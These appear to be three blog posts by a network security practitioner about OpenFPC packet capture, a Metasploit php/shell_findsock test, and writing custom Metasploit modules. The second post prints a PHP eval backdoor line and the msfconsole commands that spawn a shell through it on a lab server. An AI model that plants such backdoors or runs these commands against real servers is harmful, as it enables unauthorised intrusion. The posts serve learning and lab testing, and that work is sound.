daemonlogger, forensics, fpcgui, Information, Linux Distributions, Metasploit, OpenFPC, OpenSourceSoftware, Security, Ubuntu


In early June, Leon Ward and I teamed up in Oslo chatting about his OpenFPC and my FPCGUI project. I met Leon for the first time in April 2009 at Sourcefires offices in Wokingham, UK, and I have chatted with him now and then on IRC etc. since then.

I started using Sourcefire 3D in December 2008, and the first thing I was missing was the lack of pcaps from the events that I got. The second was the real-time view that you get in Sguil (I can live without that though).

So I needed a second host that did full packet capture along side my new IPS/IDS. Just running tcpdump/daemonlogger/sancp is OK for a small installation, but carving out the sessions manually was taking time. I needed to script something that would take an easy interface, so I could quickly get a pcap from the whole sessions I was getting events from. So I was thinking of an API and a easy way to add this to the Sourcefire 3D WebGUI.

My PoC was FPCGUI (Full Packet Capture Graphical User Interface). It can take a query in the URL, search the flow data from its database and give you the sessions details if it exists. If you click on the session, you will get the pcap served straight in you face, and I choose to open my pcaps with wireshark. With a little grease monkey magic, this would have been an OK solution for satisfying my pcap needs working with SF3D.

I made my thoughts public in a blog post in September 2009 and started coding right away. I also discussed FPCGUI with Leon the day after I posted the blog. The first release that worked good enough for me was in January 2010. Leon released his project in May 2010, and I quickly saw that we where doing more or less the same. He had implemented the distributed node part, which I had not started to even draft, and I had the WebGUI and flowdata which gives more meaning and is more user friendly to the analyst.

So, instead of working on two separate projects (aiming for the same goal), we decided to join forces and merge the two projects. And as I thought that OpenFPC is a better name than FPCGUI, OpenFPC it is 🙂

I have merged my parts slowly into OpenFPC during the summer, with vacation time and changing job, I did not have much time for coding on the side. We also re-factored much of the code, file names etc., so getting thing to a working condition has been the main task.

As of the last weeks, I can now install OpenFPC and use it in the way that I want it again, like I did with FPCGUI. The plus is that I now have a command line interface, a distributed architecture (Not WebGUI friendly yet), and a way to automagically extract pcaps and files in it, for automatic analysis 🙂

To test my dream of automatic analysis, I used a setup similar to this earlier blog post where I more or less did the same. I carve the pcap with openfpc-client (which will come from an event from an IDS or nftracker), extract files with tcpxtract (or simular tools), scan files with ClamAV and also test md5/sha sums towards shadowserver, virustotal or wepawet. I tried some different infected and non infected PDF files. All files I had to test with was detected with ClamAV, even my home grown metasploit PDF. All known bad PDF files was detected with the md5/sha sum of the files towards the different services (shadow/VT/wepawet), but again, only ClamAV detected my home made metasploit PDF.
evil.pdf: Heuristics.PDF.ObfuscatedNameObject FOUND

So, now I will have more events to live with 🙂

Back|Track, Debian, Metasploit, OpenSourceSoftware, Security, Ubuntu

Spawning a shell on the established connection to the webserver in Metasploit.

A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. Setting up a new LAMP server etc, making sure its only can connect out to the places it should need to have access too, is a good security practice. Then open port 80 for connection from the world, minus .ru and .cn etc 🙂

So I thought…

Then egypt, from metasploit, made and presented me to the “php/shell_findsock payload”, which I think is awesome!

If you can get the LAMP server to some way execute the $shell_findsock payload, you can in many cases get a shell over the established http connection! You can also use the payload with other php exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. But on my Ubuntu intrepid, I got :
sh: Syntax error: Bad fd number
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.

In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET[‘evalme’]); ?>, which would be the default for this metasploit setup.
Short version:

msf < use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST http://www.gamelinux.org
msf exploit(php_eval) > exploit

Metasploit with payload php/shell_findsock

And you thought that you where safe!

On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.

Metasploit, OpenSourceSoftware, Security

Making ones own modules in the Metasploit Framework 3.3-dev

I have been spending some time, digging into the Metasploit Framework the last two days. I first downloaded Metasploit in the beginning of this year, and simply used/tested it at home or in the lab at work. Metasploit is under rather rapid development, and I don’t know how the lads developing Metasploit, have time too sleep…

Well, after poking my hands in it for two days, I finally made my self an Auxiliary and an “Exploit”! Thats including laying my hands on ruby for the first time in my life.

The Auxiliary I made, is an simple MySQL login. It uses the username = root as default, and with no password (Well, someone probably has ‘root’@’%’ ). Im working on making it more dynamic, because right now, one can not change password, as I haven’t got ruby in my blood yet :/ and keeps bumping into minor challenges.

The “exploit” I did, was just to see If I could make one, and as I was playing with MySQL… I implemented the MySQL Authentication Bypass vulnerability found by NGSSecurity and published in July 2004 (So old, that it has to be legal to make such an exploit?).
I have not done a mysql-cli inside the msf, so it really only checks for the vulnerability (logs inn and exits). It does not give you a shell or load any payloads or what ever.

Looking at other Auxiliary and Exploits in the msf3.3-dev framework, it was surprisingly easy getting something up and running. This is truly a great framework. (This is the place to start if you want to develop something of your own!)

Here are some bumps I bumped into along the way, and also mental notes to myself:

* Place all your custom made stuff here : ~/.msf3/modules/

* Make your own Modules/Auxiliary/Stuff in
Where <TYPE> is exploit/payload/encoder/nop/auxiliary.
This is new behavior in 3.2/3.3-dev and is not documented yet.

* There are two ways to add a core resource :
1) If you really want to, the way to do it is by setting the MSF_LOCAL_LIB
environment variable to something like ~/.msf3/lib and then creating
~/.msf3/lib/msf/core/exploit/yourstuff.rb and in your exploit module, doing:
require “msf/core/exploit/yourstuff”
include Exploit::Remote::Yourstuff

2) Just add it to msf3.3/lib/msf/core/exploit/yourstuff.rb and “require” it in msf3.3/lib/msf/core/exploit.rb

I hope, and I strongly recommend, that people contribute modules to the Metasploit framework. It would also be great to see more PoC’s released in the MSF, now that MSF is under such a nice and free BSD license 🙂

I would like to thank H D Moore for taking the time to answer my n00b emails and my question in such a good, patient and quick way. (And I believe he is on vacation too!!!)